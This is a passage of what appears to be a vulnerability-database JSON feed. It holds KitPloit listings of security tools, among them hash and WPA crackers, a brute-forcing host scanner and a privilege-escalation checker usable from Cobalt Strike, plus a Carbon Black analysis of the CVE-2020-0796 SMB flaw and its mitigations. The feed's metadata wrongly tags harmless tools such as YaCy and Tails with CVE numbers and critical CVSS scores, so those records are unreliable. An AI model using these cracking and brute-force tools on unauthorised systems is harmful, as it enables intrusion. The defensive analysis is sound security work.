osCommerce \n * Redmine \n * SMF \n * vBulletin \n * Woltlab Burning Board \n * xt:Commerce \n * WordPress \n * phpBB3 \n * Half MD5 (left, mid, right) \n * Double MD5 \n * Double SHA1 \n * md5($pass.$salt) \n * md5($salt.$pass) \n * md5(unicode($pass).$salt) \n * md5($salt.unicode($pass)) \n * md5(sha1($pass)) \n * sha1($pass.$salt) \n * sha1($salt.$pass) \n * sha1(unicode($pass).$salt) \n * sha1($salt.unicode($pass)) \n * sha1(md5($pass)) \n * sha256($pass.$salt) \n * sha256($salt.$pass) \n * sha256(unicode($pass).$salt) \n * sha256($salt.unicode($pass)) \n * sha512($pass.$salt) \n * sha512($salt.$pass) \n * sha512(unicode($pass).$salt) \n * 
sha512($salt.unicode($pass)) \n\n \n\n\n** [ Download oclHashcat v1.21 ](<https://hashcat.net/oclhashcat/>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-28T04:05:25", "type": "kitploit", "title": "oclHashcat v1.2 - GPGPU-based Multi-hash Cracker", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-28T04:05:25", "id": "KITPLOIT:1370442080181927541", "href": "http://www.kitploit.com/2014/05/oclhashcat-v12-gpgpu-based-multi-hash.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T10:53:49", "description": "[  ](<https://2.bp.blogspot.com/-J630bGpPYLQ/U4P9lgOY__I/AAAAAAAACh0/aafifcpsaYA/s1600/Moscrack.jpg>)\n\n \n\n\nMoscrack is a PERL application designed to facilitate cracking WPA keys in parallel on a group of computers. This is accomplished by use of either Mosix clustering software, SSH or RSH access to a number of nodes. With Moscrack\u2019s new plugin framework, hash cracking has become possible. 
SHA256/512, DES, MD5 and *Blowfish Unix password hashes can all be processed with the Dehasher Moscrack plugin. \n\n \n\n\n** Features **\n\n * Basic API allows remote monitoring \n * Automatic and dynamic configuration of nodes \n * Live CD/USB enables boot and forget dynamic node configuration \n * Uses aircrack-ng (including 1.2 Beta) by default \n * CUDA/OpenCL support via Pyrit plugin \n * CUDA support via aircrack-ng-cuda (untested) \n * Does not require an agent/daemon on nodes \n * Can crack/compare SHA256/512, DES, MD5 and blowfish hashes via Dehasher plugin \n * Supports mixed OS/protocol configurations \n * Supports SSH, RSH, Mosix for node connectivity \n * Effectively handles mixed fast and slow nodes or links \n * Supports Mosix clustering software \n * Nodes can be added/removed/modified while Moscrack is running \n * Failed/bad node throttling \n * Hung node detection \n * Reprocessing of data on error \n\n \n\n\n[ ** Download Moscrack ** ](<https://sourceforge.net/projects/moscrack/>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-27T02:53:56", "type": "kitploit", "title": "Moscrack - Cluster Cracking Tool For WPA Keys", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-27T02:53:56", "id": "KITPLOIT:6298886136201302065", "href": "http://www.kitploit.com/2014/05/moscrack-cluster-cracking-tool-for-wpa.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T04:42:52", "description": "[  ](<https://2.bp.blogspot.com/-mcKh5FsT0pk/U4eydvAKLLI/AAAAAAAACig/H1mOgCfStMk/s1600/hostscan.png>)\n\n \n \n\n\nHostscan is a php tool which allows you to scan specific range of hosts, mostly for information gathering and testing for weak passwords. I guess it's a pentest tool, i'd created it to automate some tests that i often do. Since it's PHP, it works quite slowly compared to client-side soft. \n\n \n\n\n** How it works? **\n\n * You need to provide range of ip's (e.g. 127.0.0.1 - 127.0.0.10); program will perform operations on each address separately, basing on selected options, then it will print out the response. \n * By default, program will only check open ports, print http response headers, test for HTTP methods and check FTP for anonymous login. \n * If 'SSH/IMAP/DB's' are checked, program will try to bruteforce SSH,IMAP,MySQL,PostgreSQL & MsSQL using array of passwords and users defined on the beggining of script. Notice, that it will try to login as user with grand permissions (e.g. root, postgres), although you're able to edit it. \n * If 'FTP User' is set, program will also try to bruteforce FTP with specific user using mentioned passwords array. By default it's not, and it will only test for anonymous login. \n * If 'Deep Scan' is set, program will perform all aforementioned operations. Further, it will use nmap with specific parameters you're able to edit, also, the traceroute scan will be performed and displayed - just like nmap. 
Deep Scan also gathers some useful information about a website (if it's running), such as interesting files/folders and the www title. \n * ?url=website.com for the quick IP address of a specific website. \n\n...so - what does it do? Nmap, traceroute, port scan, ftp anonymous login, ftp/ssh/imap/mysql/pgsql/mssql bruteforce, http (website) info gathering. \n\nThe crawler accepts as a parameter an array of files and folders that you can manually edit, just like the other options. \n\n \n\n\n[ ** Download Hostscan ** ](<https://github.com/Smaash/hostscan/>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-29T22:21:37", "type": "kitploit", "title": "Hostscan - PHP tool for scanning specific range of hosts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-29T22:21:37", "id": "KITPLOIT:4378915690459298496", "href": "http://www.kitploit.com/2014/05/hostscan-php-tool-for-scanning-specific.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T10:50:14", "description": "[  
](<https://3.bp.blogspot.com/-3zjRJe6jin0/U4Pgn6dRGBI/AAAAAAAAChk/UdGvCemlSXs/s1600/comparison_why_is_YaCy_better_en.png>)\n\n** YaCy ** is a free search engine that anyone can use to build a search portal for their intranet or to help search the public internet. When contributing to the world-wide peer network, the scale of YaCy is limited only by the number of users in the world and can index billions of web pages. It is fully decentralized, all users of the search engine network are equal, the network does not store user search requests and it is not possible for anyone to censor the content of the shared index. We want to achieve freedom of information through a free, distributed web search which is powered by the world's users. \n \n\n\nDecentralization \n\nImagine if, rather than relying on the proprietary software of a large professional search engine operator, your search engine was run by many private computers which aren't under the control of any one company or individual. Well, that's what YaCy does! The resulting decentralized web search currently has about 1.4 billion documents in its index (and growing - download and install YaCy to help out!) and more than 600 peer operators contribute each month. About 130,000 search queries are performed with this network each day. \n\n### Live image of the 'freeworld' network \n\n[  ](<http://188.40.64.7:8095/NetworkPicture.png?width=640&height=480&bgcolor=FFFFFF&pal=10080&pol=10080> \"YaCy Network\" ) \n\n\n### Installation is easy! \n\nThe installation takes only three minutes. Just download the release, decompress the package and run the start script. On linux you need OpenJDK7. You don't need to install external databases or a web server, everything is already included in YaCy. 
\n \n\n\n \n\n\n** [ Download YaCy ](<http://yacy.net/en/index.html>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-27T00:52:01", "type": "kitploit", "title": "YaCy - The Peer to Peer Search Engine", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-27T00:52:01", "id": "KITPLOIT:3440136498125856121", "href": "http://www.kitploit.com/2014/05/yacy-peer-to-peer-search-engine.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T08:40:37", "description": "[  ](<https://1.bp.blogspot.com/-3JOJzA3594s/U4ezkuRIfJI/AAAAAAAACis/7HVCtNTZtSs/s1600/Hook+Analyser.jpg>)\n\n \n \n\n\nHook Analyser is a freeware application which allows an investigator/analyst to perform \u201cstatic & run-time / dynamic\u201d analysis of suspicious applications, also gather (analyse & co-related) threat intelligence related information (or data) from various open sources on the Internet. \n\n \n\n\nEssentially it\u2019s a malware analysis tool that has evolved to add some cyber threat intelligence features & mapping. 
\n\n \n\n\n \n\n\nHook Analyser is perhaps the only \u201cfree\u201d software in the market which combines analysis of malware analysis and cyber threat intelligence capabilities. The software has been used by major Fortune 500 organisations. \n\n \n\n\n** Features/Functionality **\n\n * Spawn and Hook to Application \u2013 Enables you to spawn an application, and hook into it \n * Hook to a specific running process \u2013 Allows you to hook to a running (active) process \n * Static Malware Analysis \u2013 Scans PE/Windows executables to identify potential malware traces \n * Application crash analysis \u2013 Allows you to analyse memory content when an application crashes \n * Exe extractor \u2013 This module essentially extracts executables from running process/s \n\n \n\n\n** [ Download Hook Analyser 3.1 ](<https://docs.google.com/forms/d/14iXoERDGdatSABiqa66GnKu78Wju49Me2z_h6lUhBHk/viewform>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-29T22:25:44", "type": "kitploit", "title": "Hook Analyser 3.1 - Malware Analysis Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-29T22:25:44", "id": "KITPLOIT:3348929726444940519", "href": "http://www.kitploit.com/2014/05/hook-analyser-31-malware-analysis-tool.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T08:42:41", "description": "[  ](<https://2.bp.blogspot.com/-TgiYlVlHEKY/U31FMimdZBI/AAAAAAAACgo/A-_wV0Q33o8/s1600/w3af.png>)\n\n** w3af ** , is a Web Application Attack and Audit Framework. The ** w3af ** core and it\u2019s plugins are fully written in python, it identifies more than 200 vulnerabilities and reduce your site\u2019s overall risk exposure. Identify vulnerabilities like SQL Injection, Cross-Site Scripting, Guessable credentials, Unhandled application errors and PHP misconfigurations. \n\n \n\n\n### Changelog v1.6 \n\n * Improved performance: your scans will run faster \n * Improved quality: 1300+ unittests are run after each change to make sure we don\u2019t add any regressions \n * Now you\u2019ll be able to easily integrate w3af into other projects with a simple import w3af \n * [ Better documentation ](<http://docs.w3af.org/>)\n\n \n\n\n** [ Download w3af ](<http://w3af.org/download>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-22T00:33:30", "type": "kitploit", "title": "w3af - Open Source Web Application Security Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-22T00:33:30", "id": "KITPLOIT:3872284907466902606", "href": "http://www.kitploit.com/2014/05/w3af-open-source-web-application.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T08:43:00", "description": "[  ](<https://4.bp.blogspot.com/-KuBdsEHqmS4/U4Km1oGJzEI/AAAAAAAAChI/CctJtTjQS7E/s1600/Logo_Tails-300x154.png>)\n\n \n\n\n_ ** Tails ** _ , The Amnesic Incognito Live System, is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship almost anywhere you go and on any computer but leaving no trace unless you ask it to explicitly. \n\n \n\n\n \n\n\nIt is a complete operating system designed to be used from a DVD, USB stick, or SD card independently of the computer\u2019s original operating system. It is Free Software and based on Debian GNU/Linux. 
\n\n \n \n\n\n[ ** Download Tails ** ](<https://tails.boum.org/download/index.en.html>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-26T02:31:36", "type": "kitploit", "title": "Tails - The Amnesic Incognito Live System Released", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-26T02:31:36", "id": "KITPLOIT:6714457792986818120", "href": "http://www.kitploit.com/2014/05/tails-amnesic-incognito-live-system.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T12:02:45", "description": "[](<https://1.bp.blogspot.com/-SLG1VuBq6Fo/XyDlCwNqrdI/AAAAAAAATRo/cKQCSSbfdZIOzU4fmL1R8TEBPBy-AQkMACNcBGAsYHQ/s1600/dazzleUP_1_dazzleUP.png>)\n\n \n\n\nA tool that detects the [privilege escalation](<https://www.kitploit.com/search/label/Privilege%20Escalation> \"privilege escalation\" ) [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) caused by [misconfigurations](<https://www.kitploit.com/search/label/Misconfigurations> \"misconfigurations\" ) and missing updates 
in the Windows operating systems. dazzleUP detects the following vulnerabilities. \n \n**Exploit Checks** \nThe first feature of dazzleUP is that it uses the Windows Update Agent API instead of WMI (like others) when finding missing patches. dazzleUP checks the following vulnerabilities. \n\n\n * DCOM/NTLM Reflection (Rotten/Juicy Potato) Vulnerability\n * CVE-2019-0836\n * CVE-2019-0841\n * CVE-2019-1064\n * CVE-2019-1130\n * CVE-2019-1253\n * CVE-2019-1385\n * CVE-2019-1388\n * CVE-2019-1405\n * CVE-2019-1315\n * CVE-2020-0787\n * CVE-2020-0796\ndazzleUP does exploit checks when the target system is a Windows 10 operating system (builds 1809, 1903, 1909 and 2004) that is currently supported by Microsoft. If run on an unsupported operating system, dazzleUP will warn you with \"Target system build number is not supported by dazzleUP, passing missing updates controls ...\". \n \n**Misconfiguration Checks** \ndazzleUP performs the following [misconfiguration](<https://www.kitploit.com/search/label/Misconfiguration> \"misconfiguration\" ) checks for each Windows operating system. \n\n\n * Always Install Elevated\n * Credential enumeration from Credential Manager\n * McAfee's SiteList.xml Files\n * Modifiable binaries saved as Registry AutoRun\n * Modifiable Registry AutoRun Keys\n * Modifiable Service Binaries\n * Modifiable Service Registry Key\n * %PATH% values for DLL Hijack\n * Unattended Install Files\n * Unquoted Service Paths\n \n**Operational Usage - 1** \nYou can use dazzleUP directly using the standalone .EXE and get the results. The [screenshot](<https://www.kitploit.com/search/label/Screenshot> \"screenshot\" ) is given below. \n\n\n \n\n\n[](<https://1.bp.blogspot.com/-X0O_RBn-aCM/XyDlLijcRQI/AAAAAAAATRs/_W4WwmrZMaQGkhRoODIbI3QIwfApQLGQACNcBGAsYHQ/s1600/dazzleUP_2_standalone_execution.png>)\n\n**Operational Usage - 2** \nYou can use dazzleUP directly using the Reflective DLL version on Cobalt Strike's Beacon using the `dazzleUP.cna` file. The screenshot is given below. 
For more information; <https://www.cobaltstrike.com/aggressor-script/index.html> \n\n\n \n\n\n[](<https://1.bp.blogspot.com/-pYvaONm_nS0/XyDlQC3EoBI/AAAAAAAATRw/mpSsw6MBT4weeWWO1YnAjuMMRuOO7NNDACNcBGAsYHQ/s1600/dazzleUP_3_beacon_execution.png>)\n\n \n\n\n**[Download dazzleUP](<https://github.com/hlldz/dazzleUP> \"Download dazzleUP\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-31T12:30:00", "type": "kitploit", "title": "dazzleUP - A Tool That Detects The Privilege Escalation Vulnerabilities Caused By Misconfigurations And Missing Updates In The Windows OS", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0836", "CVE-2019-0841", "CVE-2019-1064", "CVE-2019-1130", "CVE-2019-1253", "CVE-2019-1315", "CVE-2019-1385", "CVE-2019-1388", "CVE-2019-1405", "CVE-2020-0787", "CVE-2020-0796"], "modified": "2020-07-31T12:30:06", "id": "KITPLOIT:3701426813255055656", "href": "http://www.kitploit.com/2020/07/dazzleup-tool-that-detects-privilege.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "carbonblack": [{"lastseen": "2020-03-17T19:36:16", "description": "On March 
10, 2020 analysis of an SMB vulnerability was inadvertently shared, under the assumption that Microsoft was releasing a patch for that vulnerability (CVE-2020-0796). As of March 12, Microsoft has since released a [patch](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) for CVE-2020-0796, which is a vulnerability specifically affecting SMB3. \n\nSpecifically, this vulnerability would allow an unauthenticated attacker to exploit it by sending a specially crafted packet to a vulnerable SMBv3 server. Similarly, if an attacker could convince or trick a user into connecting to a malicious SMBv3 server, then the user\u2019s SMB3 client could also be exploited. Whether the target is a server or a client, successful exploitation would grant the attacker the ability to execute arbitrary code.\n\nIn addition to disabling SMB compression on an impacted server, Microsoft advised blocking any inbound or outbound traffic on TCP port 445 at the perimeter firewall. Additionally, the Computer Emergency Response Team Coordination Center (CERT/CC) advised that organizations should verify that SMB connections from the internet _are not allowed to connect inbound to an enterprise LAN_.\n\nMicrosoft released a patch for this vulnerability last week. You can view and download patches for impacted systems [here](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>). Remember, the compensating controls provided by Microsoft only apply to SMB servers. SMB clients are still impacted by this vulnerability, and it's critical these patches are applied as soon as possible to limit exposure. \n\nVMware Carbon Black technologies are built with some fundamental operating system trust principles in mind. From time to time a new attack technique will come along that breaks these trust boundaries. Oftentimes these trust boundaries affect the building blocks of the operating system security model. 
Sometimes new attack techniques make front page news but it's important to take a step back and not get caught up in the headlines. These techniques, which are part of the exploitation phase, end up being a very small piece in the overall attacker kill chain.\n\nIt is important to remember that these attacks don't happen in isolation. There are a series of steps that occur both before and after initial infection. Regardless of the attackers\u2019 motives or skill levels, the delivery or exploitation that provides them access into a network is just the beginning stages of the overall process. A process that almost always includes additional payloads or tools, privilege escalation or credential access, and lateral movement. And all of this before the attackers can begin to identify and steal the data that they are after. VMware Carbon Black aims to detect portions of the kill-chain that an attacker must pass through in order to achieve these actions and complete their objective. There are a large number of exploit detection techniques within VMware Carbon Black platform as well as hundreds of detection and prevention capabilities across the entire kill-chain. 
\n\nThe table below lists the known affected Operating System versions, released by Microsoft.\n\n**Windows Server**\n\n| \n\nVersion 1903 (Server Core Installation) \n \n---|--- \n \nVersion 1909 (Server Core Installation) \n \n**Windows 10**\n\n| \n\nVersion 1903 for 32-bit Systems \n \nVersion 1903 for ARM64-based Systems \n \nVersion 1903 for x64-based Systems \n \nVersion 1909 for 32-bit Systems \n \nVersion 1909 for ARM64-based Systems \n \nVersion 1909 for x64-based Systems \n \n**Proactive Measures and Mitigations**\n\nVMware Carbon Black is providing several methods to determine if endpoints or servers in your environment are vulnerable to CVE-2020-0796.\n\n#### **Identification and Mitigation of Affected Systems**\n\nVMware Carbon Black TAU has published a PowerShell script to detect and mitigate EternalDarkness in our public \u2018tau-tools\u2019 github repository: [EternalDarkness](<https://github.com/carbonblack/tau-tools/tree/master/remediation/EternalDarkness>). This script will identify if a machine has active SMB shares, is running an OS version impacted by this vulnerability, and check to see if the disabled compression mitigating keys are set and optionally set mitigating keys. It can be leveraged with any endpoint configuration management tools that support powershell along with LiveResponse. \n\nPowerShell Execution:\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_1.png>) \n\n\n_Figure 1: EternalDarkness Powershell output_\n\n**Live Response - Remote Execution**\n\nLeveraging VMware Carbon Black\u2019s LiveResponse API, we can extend the PowerShell script and run this across a fleet of systems remotely. The LiveResponse script is a Python3 wrapper located in the [EternalDarkness](<https://github.com/carbonblack/tau-tools/tree/master/remediation/EternalDarkness>) GitHub repository. 
EternalDarkness-lR.py uploads the aforementioned PowerShell script and can run checks or implement mitigations depending on the options provided at run-time, across the full VMware Carbon Black product line.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_2.png>) \n\n\n_Figure 2: LiveResponse Eternal Darkness output_\n\n#### **CBC Audit and Remediation Query**\n\nAdditionally, there is a new CBC Audit and Remediation search in the query catalog titled _Windows SMBv3 Client/Server Remote Code Execution Vulnerability (CVE-2020-0796)_ which can be run across your environment to identify impacted hosts. This query will identify if a machine has active SMB shares, is running an OS version impacted by this vulnerability, check to see if the disabled compression mitigating keys are set, and see if the system is patched. CBC Audit and Remediation customers will be able to quickly quantify the level of impact this vulnerability has in their network.\n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_3.jpg>) \n\n\n_Figure 3: CBC Audit and Remediation CVE Search Results_\n\nThere is also an existing query in the CBC Audit and Remediation query catalog that can be used to detect rogue SMB shares within your network. You can find this query in the IT Hygiene portion of the catalog named Rogue Share Detection. It's recommended you run this query daily to have a constant heartbeat on active SMB shares in your network. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_4.png>) \n\n\n_Figure 4: CBC Audit and Remediation Rogue Share Search_\n\n#### **Enterprise EDR Queries**\n\nWe have also deployed detections to our enterprise EDR products that look for the disable compression key being modified and for modifications of Windows shares. 
We believe that attackers could set this key to turn off compensating controls in order to be successful in gaining remote access to systems prior to organizations patching their environment. Coupled with accessing Windows shares, an attacker would be able to successfully exercise lateral movement and execute arbitrary code.\n\n### **Helpful Links**\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>\n\n<https://www.kb.cert.org/vuls/id/872016/>\n\n[https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block](<https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block>)\n\n \n\nThe post [Threat Analysis: CVE-2020-0796 - EternalDarkness (ghostSMB)](<https://www.carbonblack.com/2020/03/17/threat-analysis-cve-2020-0796-eternaldarkness-ghostsmb/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-17T14:14:25", "type": "carbonblack", "title": "Threat Analysis: CVE-2020-0796 \u2013 EternalDarkness (ghostSMB)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
